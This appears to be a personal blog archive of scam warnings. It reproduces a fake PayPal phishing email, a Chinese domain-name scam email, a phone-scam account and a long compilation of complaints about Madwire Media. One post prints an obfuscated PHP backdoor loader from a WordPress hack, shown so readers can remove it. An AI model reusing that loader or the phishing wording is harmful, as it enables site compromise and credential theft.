When Will Big Data Spill Over?

These mining firms, if you will, will eventually cave to selling to everyone.

What will we do with the data?

What will future for-profit mining operations be focused on?



SCAM:Warning: You should Confirm your Account information immediately (Fake PayPal Notification)

Got this phishing email from support support1@Int-servicess-pp.pal and cvportal.in, pretending to be from PayPal. If you get this, yes, it’s fake.  The idea is that you click through to a screen that looks like the real paypal login screen. But when you log in, you’re really just goiving these bastards your paypal login info. Be careful, kids!

Case ID #9515-9674-2194-5217

Dear Customer,
Your accou­nt has been limited until we hear from you.
Our system detected some incorrect information that have been saved to your accou­nt earlier.

What can you do ?
We just need some more information about your ??­?ou­nt,
so you must follow these steps to get your accou­nt back.
Click here to activate your accou­nt. [links to: cvportal.in/ppl.html…eventually redirects to a very long url at nimrod.in which has a fake paypal login]
Confirm that you are the accou­nt holder
Fill all the required fields

We thank you for your prompt attention to this matter,
Please understand that this a security measure intended to help protect you and your account
We apologise for any inconvenience
yours Sincerely,

Copyright © 2014 PayPall, Inc. All rights reserved.


Screen shot 2014-11-16 at 3.11.36 PM



Here’s what it looks like when you click:

Screen shot 2014-11-16 at 3.17.13 PM

For some reason, the senders of this scam email use a charset that doesn’t translate to my wysiwyg in WordPress. Y, P, A, C and E become question marks. Example:

Subject: Warning: You should сonfirm your а­ссount informаtion immediately.



??­???­l  Case ID #9515-9674-2194-5217

Dear ?ustom?r,
Your ??­?ou­nt has been limit?d until we hear from you.
Our system detected some incorrect information that have been saved to your ??­?ou­nt earlier.

What can you do ?
We just need some more information about your ??­?ou­nt,
so you must follow these steps to get your ??­?ou­nt back.

  1. ?li?k h?r? to activate your ??­?ou­nt. [links to: cvportal.in/ppl.html]
  2. ?onfirm th?t ?ou ?r? th? ??­?ou­nt hold?r
  3. Fill ?ll th? r?quir?d fi?lds

W? th?nk ?ou for ?our ?rom?t ?tt?ntion to this m?tt?r,
?l??s? und?rst?nd th?t this ? s??urit? m??sur? int?nd?d to h?l? ?rot??t ?ou ?nd ?our ???ount
w? ??ologis? for ?n? in?onv?ni?n??

?ours Sin??r?l?,

?o??right © 2014 ??­?­???­l, In?. ?ll rights r?s?rv?d.


Case ID #9515-9674-2194-5217

Dear Сustomеr,

Your ас­сou­nt has been limitеd until we hear from you.

Our system detected some incorrect information that have been saved to your ас­сou­nt earlier.

What can you do ?

We just need some more information about your ас­сou­nt,
so you must follow these steps to get your ас­сou­nt back.

  1. сliсk hеrе to activate your ас­сou­nt.
  2. Сonfirm thаt Ñ?ou аrе thе ас­сou­nt holdеr
  3. Fill аll thе rеquirеd fiеlds

Wе thаnk Ñ?ou for Ñ?our Ñ?romÑ?t аttеntion to this mаttеr,
Ñ?lеаsе undеrstаnd thаt this а sесuritÑ? mеаsurе intеndеd to hеlÑ? Ñ?rotесt Ñ?ou аnd Ñ?our ассount
wе аÑ?ologisе for аnÑ? inсonvеniеnсе

Ñ?ours SinсеrеlÑ?,


СoÑ?Ñ?right © 2014 Ра­Ñ?­РÙ?а­l, Inс. Аll rights rеsеrvеd.

Chinese Domain/Trademark Scam

Me: This is a scam where they try to get you to pay to protect your trademark, or avoid a lawsuit or something like that.
Email says:
(Please forward this to your CEO, because this is urgent. Thanks)

We are a Network Service Company which is the domain name registration center in Shanghai, China. On Oct 27, 2014, we received an application from Huayu Holdings Ltd requested “[your company domain name]” as their internet keyword and China (CN) domain names. But after checking it, we find this name conflict with your company name or trademark. In order to deal with this matter better, it’s necessary to send email to you and confirm whether this company is your distributor or business partner in China?Kind regards

Sean Zhang
General Manager
Yi Guan (Headquarters)
3002, Nanhai Building, No. 854 Nandan Road,
Xuhui District, Shanghai 200030, China
Tel: +86 21 6191 8696
Mobile: +86 138 1642 8671
Fax: +86 21 6191 8697
Web: www.yiguannetwork.cn

Scam: Fidelity Express, Beverly Hills, Called Me Claiming I was Going to be Served by a Sheriff

Phone number (310) 300-0101

This number has been calling me every few days for the couple weeks.  Today, for some reason, I actually answered.

The woman said she was trying to verify that I would be “here” to get served by a sheriff. And that the sherif would only try two times to serve me after which… don’t remember… something about a warrant.

She said that she was merely a legal document processor and knows nothing about my case, but it has been “red flagged” and she only deals with red flagged cases.

She said she could give me a number to call and a case number but that’s the information she has. When I asked her, she said she worked for Fidelity Express.

The number she gave me to call is 1-849-292-8022… Unless I copied it down wrong, that’s a Dominican Republic Area Code.

I asked a lawyer I know about this and he said:

Sounds like a scam.  I get repeat calls all the time from Beverly Hills, Pasadena, Detroit, NY, Miami, you name it.  I rarely answer them. So in the future never identify yourself to strangers on the phone.  Never give a stranger information over the phone. If I do answer and realize it’s not a call I want to take I just say, “Can I take a message?” I won’t even verify if they have the correct number.

If there is any validity to the call avoid being served.  So if a “sheriff” or process server comes to your door, don’t answer the door. As far as I know a sheriff can only serve papers from a court w/in that sheriff’s county.  So the [some] County sheriff’s office can’t serve papers for a court in [somewhere else] for instance or even [nearby county].  

I bet if you call that number they will tell you to send money to X to pay the “fine” or whatever.  I would not suggest you make that call number because then you are rated higher as a candidate for scamming another time. If you get served for a case in another country you can ignore it. If you get served for a case in another state let’s talk.  You would have to file a demurrer to personal jurisdiction.  I think I have a copy of one somewhere.


I decided to call the number I was called from, 310-300-0101 and I got a phone service recording saying “this is not a valid phone number”

Audio Version of Om Malik’s “With Big Data Comes Big Responsibility”

Om’s post is here:


I decided to have this read by OSX’s Alex voice, which I thought was fitting, given the subject.


QR’s are for original post and recording software used.

With Big Data Comes Big Responsibility


By Om Malik


Read by Mac OS X.6’s Alex at the whim of Andrew A. Peterson


Recorded with SoundFlower


A New-ish WordPress Hack

DELETE anything that looks like the below from all your theme files.

$z=get_option(“_transient_feed_fbc2353992919b11fc48934d3e55bd94″); $z=base64_decode(str_rot13($z)); if(strpos($z,”95A5440F”)!==false){ $_z=create_function(“”,$z); @$_z(); }



WARNING: MADWire Media, Marketing 360: Behind the veil of SEO and Astroturf

To Bluehost staff and legal dept: Please look closely at the specifics of any court orders before assuming that this content is actually not compliant with any documents sent by parties wishing to have this content removed from the web. I have carefully complied, line-by-line, with all rulings. Thanks.

Jump to original Madwire 360 / Marketing360 reviews post below

Visit the unlisted/hidden Madwire / Marketing 360 Yelp! page here

Jump to the comments section of this post

I’m back! And I’m in total compliance. :)
UPDATE 2015-02-08: So apparently, Madwire was able to get my entire hosting account taken down with a court order resulting from a defamation claim. But this post will return, albeit slightly altered to protect my hosting account from being shut down again.
In the meantime, the court ruling contains all the content in question, including all the Madwire Reviews and Madwire Complaints and there’s a copy of it here: http://cvweb.clerk.leon.fl.us/cvimage/official_records/download_document.asp?book=4729&page=01970&type=OR&jwuser=&subnet= (it takes a few minutes to load because it’s around 6MB and 60 pages)
Also, notice: the Affidavit of Diligent Search, mentioned on page 2, is conspicuously missing from the evidence. I wonder if that was an accident. I think not.
To Madwire: just let it slide! Everytime I update the content here, I move up in search results! It’s called the Streisand Effect: http://en.wikipedia.org/wiki/Streisand_effect
And frankly, I’m sick of this post and having to keep changing it after account suspensions (I think this the 4th time!). But I wont go dark. It’s a matter of principle.
To anyone wishing to read my post as it appeared in December of 2014, including the comments, it’s stored at the WayBack Machine: https://web.archive.org/web/20141208100043/https://andrewapeterson.com/2013/12/warning-madwire-media-madwire-360-behind-the-veil-of-seo-and-astroturf
NOPE! this has been taken down :)
Meanwhile, I must disable comments on this post for the moment, while I remove some content ruled by a Florida court to be defamatory.
[2015-02-25: COMMENTS ARE BACK!]
But feel free to send me a message via my contact form: https://andrewapeterson.com/contact
When you see XXXXX stuff, it’s words I needed to delete from the below content in order to be compliant with the court order.
[update 2015-01-11] I heard through the internet that Madwire is no longer using a non-disparagement bit in their standard contract.  This is good news if it’s true, but I have no way of knowing for sure if it is true.  So if you have any info on this, please comment!  This post is here to help other people.  So if you can help me keep the info up to date, since I have great SEO power concerning Madwire, you will help other people.  Please do comment. Is this real? It’s a link about madwire’s change of policy. Thanks, everyone, for contributing. We may be making a difference here!
[update 2014-09-26] Madwire has appeared to have filed, in a Florida court, a “Complaint for Declaratory Judgement,” against an anonymous person whom, according to the document, HERE (a PDF) is one of my my commenters below. This appears to be a way that Madwire can get Google and other search engines to un-index this blog post, Madwire’s Yelp! page and a few other search results where this anonymous person has posted.  So apparently, one of my commenters is the defendant known as “John Doe 1” in the filing (Madwire is referred to as the “Plaintiff”).  And I just noticed that Madwire’s Yelp! page suddenly has a meta noindex tag (<meta name=”robots” content=”noindex”>) on it and no longer comes up in Google search results for ‘Madwire Reviews.’ So I guess Yelp! is cooperating with Madwire for whatever reason.  I’ve always had pretty positive feelings about Yelp! despite all the recent negative hype about them, but if they’re willing to hide negative reviews, it certainly decreases their value as a consumer awareness product.  Also, I was assuming that at some point Madwire would contact me or at least post a comment on this post, but so far it appears that they’d rather try to control their reputation through back channels.  Interesting.  To Madwire: I know you guys are looking at this.  Don’t you have anything to say?
[update 2014-06-14:] My site has been taken down again over this post. This time it was ripoffreport.com that sent my hosting company a DMCA Takedown.  Their claim is that my ‘fair use’ quotation of negative Madwire reviews from their site (which contained attribution) was a copyright infringement!  So I had to remove several negative reviews/stories concerning madwire.  To the next reviews site considering sending a takedown or threat: you are only making this post more visible! Every time it’s edited/updated, it gains value in google serps.
[edit 2014-05-07:]Pissed Consumer sent my hosting company a DMCA takedown notice for this post, due to me quoting negative reviews for Madwire. I’m pretty sure this post is fair use, but my hosting company wont stick up for me  so I had to delete the pissedconsumer reviews in order to get my site back online.  I’ve linked to the originals.  Keep in mind, original bad reviews on pissedconsumer.com are often hidden on the page  and you have to click ‘read the complaint’ to see what you’re looking for.

Original post starts here.

The other day I posted about a friend’s personal experience with MADWIRE, which was horrible to say the least.

I’ve become kind of fascinated by how well this company appears to have created a facade of positive reviews and press, making them seem like a great company to hire.

It’s actually quite difficult to find anyone out there saying anything bad about them, which is a bit suspicious (even the companies I love the best are getting flamed occasionally).  So I’ve been doing some deep googling and I’ve found a lot of stuff that not only sounds more credible and like real people wrote it, but that’s also totally consistent with my experience.

So let the SEO battle begin!  I have great Google mojo with my blog.  And my goal here is to make the world-wide neighborhood a better, safer place.  So here is a compilation of what I’ve found about Madwire that may not be so easy for most people to find, since the search results for things like “madwire reviews” and even “madwire negative reviews” are so cluttered with astroturf.

From the Madwire / Marketing360 Better Business Bureau pages:

Complaint #1: 10/10/2013

Complaint: We paid for two months of Search Engine Optimization & AdWords for our company website through Madwire Media. We never reached the top of the search engines, we received 1 potential customer who filled out our “Contact Us” form, that was it. We paid $750 a month for a total of $1450.00 plus Madwire has tried to pull more money out of our account without authorization. They have added all these additional fees and now are threatening to take us to collections. They promised us a “free” website, they put it up for us but once we cancelled our marketing through them, they posted our website as “ACCOUNT SUSPENDED” which reflected horribly and lost us potential customers from consumers that were directed to our site through our own advertising means. We called them and asked them to put the website back up but they said they wouldn’t unless we paid for the hosting through them but it was a ridiculous amount. The website was supposed to belong to us but they wouldn’t give it to us without paying for their hosting (we already have hosting through someone else). We were offered so much and received nothing but headaches.

Desired Settlement: My desired settlement would be a refund of all money paid, $1450. They didn’t deliver on ANY of their promises. They said we would be on the top of the internet searches, which didn’t happen.Also, we didn’t get to keep the website. We were much better off than before we ever started with Madwire. From what I have read on the internet, we are not the only company that Madwire has scammed. Since internet marketing is so vague, they are able to take advantage of many consumers.

Business Response: Attached is the contract for reference and a receipt of refund. I talked with the client about the contract and services that we provided. We have already made a refund in the amount of $720.00 and we are not moving forward with collections on the remaining part of the contract.

Business Response: An email was sent to ‘*********************’ on 8/21 outlining the details of the contract as well as additional. Also an email was forwarded to ****************** on 8/23.

Consumer Response: Complaint: *******

I am rejecting this response because: they did NOT give me a refund, they just didn’t charge me after I cancelled my account. It’s not that I MISUNDERSTOOD anything (like Jerry’s letter refers), it is that they are rude, did nothing with all the money we gave them and used our “credits” on what? We don’t know! They are a scam and I am demanding full refund. I will keep  on warning other potential customers  about their misdeeds b/c no one deserves to lose $1500 on absolutely nothing, especially when you are a small business, like us.


******** ******

Business Response:
That should do it. One is the contract which speaks to what the consumer was complaining about. All of the information is in there. And the other is an invoice for a refund. This client signed 6 month contract to which we were going to send to collections for early cancellation 2 months in on the contract. Upon receiving the email they filed a complaint with the BBB. In addition we invested $3K dollars of time on a website as part of the agreement. Outlined within the contract it talks about early cancellation with the option of hosting. They disregarded all emails. We took the site down that we own for nonpayment. Not only did we not pursue collections for breach of contract after speaking with ******** we also gave them a refund. It is unfortunate how this process works.

15 Day Collection Letter sent 7/31/13
30 Day Collection Letter sent 8/15/2013

If you have any other questions please feel free to reach out to me.


BBB’s Final Determination: Business offered a resolution. Consumer did not pursue further with BBB and the matter was assumed to be resolved

Complaint #2: 9/16/2013

Complaint: In June of 2013, Madwire Media Reviews contacted me and performed high pressure sales tactics to get me to sign a contract with them. They asked me to give them a large sum of money to start the campaign, which included web design, marketing, seo, and pay per click ads. They made all kinds of promises to which they were not able to hold up to. They promised a good web design and I get a mediocre, at best, design. Their site is beautiful and they said mine would be similar. They lied. They also told me that I would have 100% control of my website and be able to host it on my own server. Another lie. They have control of my website and I can’t make changes because I can’t access the backend. Madwire Media promised me 15-20 calls per day, based on my budget and the keywords targeting for my niche. Another lie. My campaign has been running for over two months and I have received two calls in that time period. Once call I actually booked the job, a $60 job, 45 miles out of my territory. I did the job anyway because my business, my name, and my reputation are at stake. They filled me full of their lies and promises in order to get me sign a contract and give them my payment info. I have done one job in the two months since my campaign started with Madwire Media and when I asked for a refund, they refused. They are not familiar with my industry and are targeting the wrong keywords that aren’t remotely targeted to my industry and they are charging me a premium rate and expect me to keep paying them $2500 per month for services NOT rendered. This fraudulent company needs to be exposed for who they are.

Desired Settlement: I want 100% of my money back. In my business, if a customer is not happy with the work, I redo it for free. If they are still not happy, I refund their money because my reputation is at stake. They promised me I could get my money back yet they refused to refund it when I asked.

BBB’s Final Determination: Consumer accepted resolution offered by the business.

Complaint #3: 9/5/2013

Complaint: I was told that there was NO contracts by several people, several different times before starting my marketing and web design with Madwire Media. **** ******** and ******* ***** both had stated that there is no contracts, until we no longer wanted to use there services after three months of very poor results and NO service. They told us one thing and had us sign documents that were supposedly forms that gave them permission to edit and change our current webpage, little did we know in the small print they lock you into a 6 month contract. This is the most dishonest and rude company that I have ever come across. We would like this matter resolved before we have to hand things over to our lawyers. Please Advise

Desired Settlement: I would like this to be resolved quickly and professionally, I would like for the remaining time and money in our contract to be wiped clear and the harassing phone calls and emails to STOP. I cant believe that there are companies out there like this that LIE and DECIEVE people to make a living.

Business Response: I spoke with ****** and addressed the concerns over the contract and client was satisfied.

BBB’s Final Determination: Business offered a resolution. Consumer did not pursue further with BBB and the matter was assumed to be resolved

Now on to Yelp! where MADWire currently has ONLY negative reviews [2014-10-07: this has changed. Now Madwire has one star on yelp but yelp appears to have cooperated with Madwire in burrying their page. Yelp put a noindex tag on Madwire’s one-star page so it wont show up in search results]:

Patty S.
Fort Collins, CO

Just the fact that another reviewer is saying “I’ don’t know what this guy is talking about” and then you can’t find that review gives you an indication of how many people are not happy with XXXX XXXXXXX XXXX XXXXXXXXXXXX XXX XXXXXXXXXXXXXX XXX XXX XXXX. Once they have your XXXXXX XXXX – XXX XXX XXXXXXXX XX X XXXXXXX XXXXX. XXX XXXXX XXXX XXXXX XXXXXXXX XX XXXXXX XXXXXXX. it is nice looking with great images and graphics but no one can find it. XXXX XXXX X XXXX XXXX XXXXX XXXXXXXXXXXXX XXXXXX XXXXX XXXXXX XXX…..and i suspect many bad reviews have been deleted here because they are misssing from here…….what does that tell you? Yelp took money to get those taken off…….hmmm let’s see how long this review lasts….

Comment from Jerry K. of Madwire Media
Business Owner 8/28/2013 I can’t find your account as doing business with us. Please contact me so that I can take care of… Read more

Joe S.
Huntington Beach, CAJoe S.
Damn I just spent 20 minutes on the phone with Marketing 360 the salesman had all the answers and only wanted $ 2500.00 per month to start? But promised first page placement so I just goggled SEO companies in Denver and guess what there not even on the first page! So I inform the salesman of my search result and he informs me that there parent company in Madwire Media and sure enough they show-up on the 2nd page with all these wonderful Yelp reviews.

Looks like Yelp really saved me time and money, Thanks

A’ngela S.
Gilbert, AZ
hare review
A’ngela S.
BUYER BEWARE!!! I am not kidding you, if you choose to use MadWire360 or Mad wire media or whatever they go by (hint it will have 360 in it somewhere) You are XXXXXXXXX XXXXX XXXXX XX XXX XXXX!! They know how to market their site and unfortunately the talent ends there.. After they smooth talk you into their wonderful service and pass you off to some “Specialist” SEO person, you become just another credit card paying their overpriced fees.. I was with them 3 months and not one lead!!! i spent over 7k and got zip from it!! All i can say is stay away and remember, Pay per click is cheaper than these guys and SEO just means blog on your own site!! Save your cash…

Good Luck
AZ. UnHappy Sucker..

Randy W.
Houston, TX
hare review
Randy W.
STOP!! DON’T USE THIS COMPANY!!! I don’t want anybody to have to go through what I went through. Bottom line. This company will take your money & never do the service. XXXXXXXXX. XXXX XXXXXXXXXXXXX. Can’t created a logo or design. They always want money up front. Don’t ever pay anybody up front. This company is all about sales . The Company is XXXXXXXXXt, full of fast talking salesmen, very expensive and doesn’t deliver the product. BUYER BEWARE!!!!!!!

John G.
Fort Collins, COJohn G.
When it comes to SEO it doesn’t get much worse than MadWire Media! XXXX XXX XX XXX XXXX XXXX XXXXXXX XXXXX XXXXXXXX XX XXXX XXX XXXXXXX XXXX XXXXXXXX XX XXXXXXXXXX. Not only that, I had previously left a review on their Google listing along with close to 10 other dissatisfied customers and their listing has seemed to magically disappear along with all of the negative reviews. They obviously try their hardest to hide how bad they suck. I couldn’t seem to find any other SEO companies that had to do such things. These guys are bottom of the barrel! They provide unnecessary services and XXXX XXXXXXXXXXX XXXXXXXXXXXXX or they just don’t care about their clients. Whichever it is, it would be wise to steer clear of this company.


Comment from Jerry K. of Madwire Media
Business Owner 2/26/2014 FAKE REVIEW! John Gotti is deceased. This is not a customer nor have we ever done business with John… Read more

Charles D.
Junction City, ORCharles D.
Just when I thought all my issues with Madwire were well behind, I got rid of them over a year ago, they recently started billing my card for someone else’s website! It’s pretty scary that they have kept my credit card information on file well over a year after firing them. Not only that, the billing information is now completely different from when we used them, so obviously they don’t even bother with AVS. I guess why would you bother when I’m pretty sure keeping actively old clients’ card info on file if probably illegal and definitely unethical. The fact that they are so XXXXXXXXXXX that they start to bill me instead of a competitor’s account is absolutely ridiculous.

Originally we had Madwire design a logo, website, and manage some seo work. Problems started from the start. They could never get the logo right and I ended up having to hire someone else to provide custom artwork to be used in the logo. For the amount I was paying them for logo design I expected custom and original work. What I received was below par with no effort or creativity behind it. It was as if I hired one of the $4 an hour guys off oDesk but at 20 times the cost.

Now when it came to the website I was already pretty leary of them from the logo design part of the package. The beginning part of the web design was a complete nightmare. The project manager wouldn’t even respond to my requests or questions. I had to contact the supervisor and complain. I was assigned a new project manager to take over the design, or lack thereof. As a side note, the previous project manager is still employed there. The new project manager handled everything much better, however they really pumped the site out quickly due to the job being way behind and there were little errors I had to pester them about to get fixed.

The next disaster came their SEO package. When we signed up for all of this work to be done it was actually an SEO package. When the site was up and running they said they no longer do that and it is now a Madnoodle package where you are listed and gift cards go up for penny auction. Now, SEO-wise this did nothing for our website. This really didn’t even help sales either. We would pay them, they would buy these gift cards from us to post on their Madnoodle site, and then customers would use the gift cards to buy products on our site. It was usually the same people who would buy these gift cards so no new customers were being attracted. Plus these same customers haven’t returned after using these gift cards that we basically bought for them. I should also note the penny auctions were a giant fail and they no longer do this.

My advice is to steer clear of this company. If you don’t you will definitely regret it! Just when I thought all our problems with them were over with… Hope you enjoy the chargeback fees!

Edit 2/14/14: These jerks still have not completely removed my information! I still get invoice emails monthly for their crappy plugins I don’t use. Granted, the invoices are for $0.00, but just stop! I’ve already asked for our information to be completely removed but of course they can’t comply.

To touch on the management responses on some of these reviews (Boo hoo hoo Yelp is being mean to us, these reviews are fake, blah, blah blah). How about you actually listen and fix your company instead of complaining? These negative reviews are sticking because more negatives come from real Yelp accounts, compared to the many positives that are from accounts who have only reviewed Madwire and then never logged in again. Which ones do you think look fake to Yelp? Oh, and just because someone has a fake name doesn’t mean their review is fake either.

Holli W.
Charlotte, NCHolli W.
Worst business decision I’ve ever made. DO NOT USE THEM! They will sell you and do a great job selling you. XX XX XXX XXXX. They are hard to work with, never responding, never making changes. It took WEEKS for them to make ONE small edit. They say they will create banners for your website, they are ugly and horrible. I even sent them pictures of what I liked. I finally had to pay someone to do it right. So much money wasted.

Comment from Jerry K. of Madwire Media
Business Owner 2/26/2014 I can’t find your account as doing business with us. Please contact me so that I can take care of… Read more

Ekaterina B.
San Jose, CAEkaterina B.
I agree with the review that said “$5,000, and not a single client.” This is how I felt when I was using this company. It is true that they XXXXXXXXXXX XXX XXXXXXXXXXXX. When I finally questioned them why I only got ONE client in 3 months, they said “well, lets try another thing.” I am not paying for trial and error. I pay them to know what they are doing. Horrible and XXXXXXXXX.

Michael G.
Brentwood, CA
hare review
Michael G.
First to Review
Working with Madwire has been one of our companies biggest mistakes! It has been over a year and a half and we still do not have a finished product. We have gone through 3 programmers and it seems like they just keep wasting our marketing departments time. We spent a significant amount of money and expected a certain amount of service. They have not delivered. I would not recommend them to my worst enemy. The frustration has built up to the point where we want to jump ship and get our money back.Comment from Jerry K. of Madwire Media
Business Owner 2/26/2014 Please contact me so that I can take care of the situation. I can’t find your account as doing… Read more

From truckmountforums.com (apparently madwire’s sales team targets people’s carpet cleaning business?)


Attention fellow carpet cleaners. I am posting this to warn everyone of a XXXX being pulled by Madwire Media. I posted a while back, asking if anyone had any experience with them. I didn’t receive very much info so I assumed they were legit. I should have done more research and I didn’t, and now I’m paying for it. So, I am here to expose these XXXXXX and make sure none of you get XXXXXX XXX. Please watch my videos, subscribe, and share so that we can expose these XXXXXX and hopefully prevent anyone else from making the same mistake I did and losing their entire business to XXXXXXXXXXXX XXX XXXXXXXXX companies like Madwire Media. I will not stand idly by as they XXX people off and are not held accountable for it. In my business, if a customer is not happy with the work performed, I will redo it at no charge. If they are still not happy, I will refund their money. Why? Because my name, my business, and my reputation are at stake and I don’t want any of it tarnished over a few dollars. Madwire Media does not feel the same. They think it’s ok to XXXXX XXXX XXXXX XXXXXXXXXXXXXX. XXXX XXXXX XXX XX XX XXX, as long as you get the sale. Please, I ask all of you to help with my plight. I may go out of business before I get soon but if I do, I will take the ones responsible with me and I will make sure they can’t XXXXX XXXX XXXXXX XXXX. Please go to http://oxydry.co/carpet-cleaning-marketing/ and watch my video directed at you, my peers. Also, you can go here http://oxydry.co/madwire-media-reviews/ and if you don’t mind, please leave a comment on the pages. Your help in this matter is greatly appreciated and I hope I am able to dig myself out of this hole.

Thanks to all.

Read more: http://www.truckmountforums.com/threads/madwire-media-reviews-warning-madwire-media-scam.47238/#ixzz2nH8DiZq9
Follow us: @truckmountforum on Twitter | truckmountforum on Facebook

From scamgroup.com


Took my entire advertising budget and single handedly almost bankrupt me.

On May 28th, Karen Brennan with Madwire Media sent me an email but claimed to be from CarpetCleaningMarketing360.com. Now this is one of many of their niche scam sites that they have. Over the course of a month she called and called and called. Finally I decided to listen to her and what she told me sounded amazing. She made all kinds of promises about me getting 15-20 calls per day with their marketing and seo. Well I was just starting a business and decided to go with Madwire Media because I simply didn’t have time to go out and actually do the work I needed to do on top of trying to market and advertise. Karen told me that based on the amount of monthly Google searches for my keywords, I would get 15-20 calls per day and I figured I should at least book 2-3 of them. So I sent them a large some of money, my entire advertising budget based on the promises made.
Fast forward to the date of this report. My campaign has been running for over 2 months now. I got one call in 2 months and it was a $60 job, 45 miles from me. They are targeting niche long tail keywords that are barely related to my industry and get very few searches. My seo campaign is horrible. They have control of my website and can lock me out at any time. XXXX XXX XXXXXX XXXX XXXXXXXXX XX XXXX.
Now in the meantime, I have had my phones turned off and I literally cannot pay my bills. I gave them my entire advertising budget because they promised me a big jumpstart in business and promised I would be busy. XXXXX XXX XXXXX XXX XXXXXXX that do NOT know what they are doing,One thing they should have thought about before XXXXXXXXX XX XXXXX and destroying my business…… I was an seo guy for 7 years, I am a single father with 3 children and this is my lively hood. I put my entire savings into my idea and they single handedly destroyed it. So, I have made it my mission to make sure they don’t XXX anyone else off. I am broke, getting ready to have equipment repossessed if I can’t sell something to make the payment, I have resorted to applying for emergency food stamps to feed my children until I can recoop something or until my seo efforts pay off.
I have asked them for a refund several times and they have refused, therefore, I am going to make sure they never steal from another company or person that needs seo work or internet marketing services.
Madwire Media has gone around to all these review sites including ripoff report and have posted fake positive reviews because of all the negative reviews they are receiving. They are paying these companies like yelp and ripoff report to remove negative reviews so they can keep their Madwire Media Review XXXXX up.They XXXXXXXXX my business, I have nothing left to lose. I will make it my plight in life to shut these XXXXXXXXX down. I hope that Scam Group will help shut these guys down before before someone else loses their life savings to these XXXX artists. XXXXXXX XXXXX XXX XXXXXXXX XXX XXXX XXXX XXXX XXXXXX XXXX XXX. I will not sit by idly and let them XXXXX from others.

From a comment on one of MADWire’s own YouTube videos 

Be very careful about using Madwire Media. We spent over $3k with them and didnt get 1 single client. Our website had images missing and took 7 weeks to complete rather then the 14 days we were told. If you do want to use them make sure you record every telephone conversation you have with them and get everything the sales person tells you in writing!! Do your research before using Madwire Media! There appears to be a consistantly to the negitive feedback which tells its own story!!

There were similar testimonials on some other youtube videos I found last night, but they’ve been deleted.

Now on to RIPOFFREPORT.com

It seems that when you get a negative review on ripoffreport.com, you can pay to have it covered up!  For instance, with Madwire, if you search for “madwire reviews” you certainly find ripoffreport, but the titles are negative and review copy is a boilerplate positive thing put there by ripoffreport!  Dubious.  I finally found a few of the original bad reviews at ripoffreport


[redacted! ripoffreport sent my hosting a copyright infringement takedown notice because I quoted their site]


[redacted! ripoffreport sent my hosting a copyright infringement takedown notice because I quoted their site]

from pissedconsumer.com, also highly astroturfed but there’s stuff there if you dig

August, 20xx

HERE is the original Negative Review of Madwire.  You must click on “Read the Complaint” [content removed due to copyright infringement claim by pissed consumer sent to my hosting compnay]

march 6 20xx

HERE is the original Testimonial about Madwire / Marketing 360.  You must click on “Read the Complaint” [content removed due to copyright infringement claim by pissed consumer sent to my hosting compnay] 

Jan 29, 20xx

[content removed due to copyright infringement claim by pissed consumer sent to my hosting compnay] 

March 15, 2012

HERE is the original Customer Complaint about Madwire / Marketing360.  You must click on “Read the Complaint”
[content removed due to copyright infringement claim by pissed consumer sent to my hosting compnay]

March 1, 2013

HERE is the original Customer Complaint about Madwire / Marketing 360.  You must click on “Read the Complaint” [content removed due to copyright infringement claim by pissed consumer sent to my hosting compnay]

January 29, 2013

HERE is the original Customer Complaint about Madwire / Marketing360.  You must click on “Read the Complaint” [content removed due to copyright infringement claim by pissed consumer sent to my hosting compnay]

It’s me again.  I have stuff to do today so I’m going to stop for now.  You get the idea.  Maybe I’ll add more later.


[update 2014-10-01]the following is a list of other domains that appear to associated with Madwire. If it’s the same people, I don’t see any reason why there’s not plenty of love to go around. It is ‘Loveland, Colorado; after all
  • bigcommercemarketing360.com
    html title: #1 Bigcommerce Marketing Platform | Bigcommerce Templates & Design
    Daily visitors (according to informer.com): 1 643
    Keywords:Big Commerce, bigcommerce, marketing 360, bigcommerce seo, marketing360
  • ecommercemarketing360.com
    html title: eCommerce Marketing Services – eCommerce Software & Website Templates
    Daily visitors (according to informer.com): 1 186
    Keywords:ecommerce 360, ecommercemarketing360 review, ecommerce360, ecommercemarketing360 scam, free ecommerce store mockup
  • mymarketing360.com
    html title: Login – Marketing 360®
    Daily visitors (according to informer.com): 686
  • contractormarketing360.com
    html title: Contractor Marketing, Leads for Contractors – Websites & Contracting Advertising Services
    Daily visitors (according to informer.com): 534
    Keywords:construction website templates, contractor marketing, ads website template, free building contractor website templates, free contractor website templates
  • businesswebsites360.com
    html title: Business Websites 360™ – Best Business Website Templates & Designs
    Daily visitors (according to informer.com): 534
    Keywords:business website templates, business marketing websites, top business websites, marketing website templates, mad360
  • mad360.net
    html title: Mad360 – The Leader in small business inbound marketing
    Daily visitors (according to informer.com): 534
    Keywords:360 marketing, marketing 360, marketing360, mad 360, mad360
  • wordpressthemedesigner.net
    html title: WordPress Theme Designer | Custom WordPress Theme Designers
    Daily visitors (according to informer.com): 534
    Keywords:custom wordpress theme design, wordpress theme designer, theme designer, custom wordpress theme designer, wordpress transportation theme
  • chiropracticmarketing360.com
    html title: Chiropractic Marketing 360 | Chiropractic Websites | Chiropractic Advertising | Chiropractic Website Templates
    Daily visitors (according to informer.com): 534
    Keywords:Chiropractic marketing, chiropractor marketing, 360 marketing, marketing 360, marketing360
  • dentistmarketing360.com
    html title: Dentist Marketing 360 – Dentist Websites | Dentist Advertising | Dentist Website Templates
    Daily visitors (according to informer.com): 89
    Keywords:dentist marketing, dental website templates, dentist website template, dentist website templates, template dentist free
  • medicalmarketing360.com
    html title: Medical Marketing 360 – Medical Websites | Medical Advertising | Medical Website Templates
    Daily visitors (according to informer.com): 89
    Keywords:medical website design, medical website design templates, healthcare marketing 360, doctormarketing360, youmedical template
The Registrant of all these domains appears to be John Kellogg who is also the CFO of a company called Traders Network or tradersnetwork.com which shares the same address as Madwire. I’m not sure but John Kellogg may be the same person as Joe Kellogg and/or JB Kellogg.
A few extra search terms for Marketing360
  • Natural Listing Ads
  • Top Placement Ads
  • Retargeting Ads
  • UXi Websites

Dubious Solicitation Regarding WP Security: Clearwater Security Research Lab

Dear [your name here],

How are you? I am Fahad Hassen, a php developer from Clearwater working
with website security. I am writing to ask whether you are aware that your
domain configuration has serious security issues which lets anyone use your
email address without your authorization?

Just to prove this to you, I can send an email to you from “your email
address itself”. Do you want me to send an email to you from your mailbox
itself, so you can see the problem?

I found your website while researching the websites using the wp-e-commerce
plugin, as part of a security research to strengthen the plugin’s security.
I also found that your website’s wordpress files are not protected, which
means by right clicking and checking the source code of the website, almost
anybody can figure out the framework you are using (wordpress), its
version, the themes and plugins you are using etc. A competitor or anybody
interested in your site can easily duplicate your site since the whole
structure of your site is exposed. Further, since wordpress is very prone
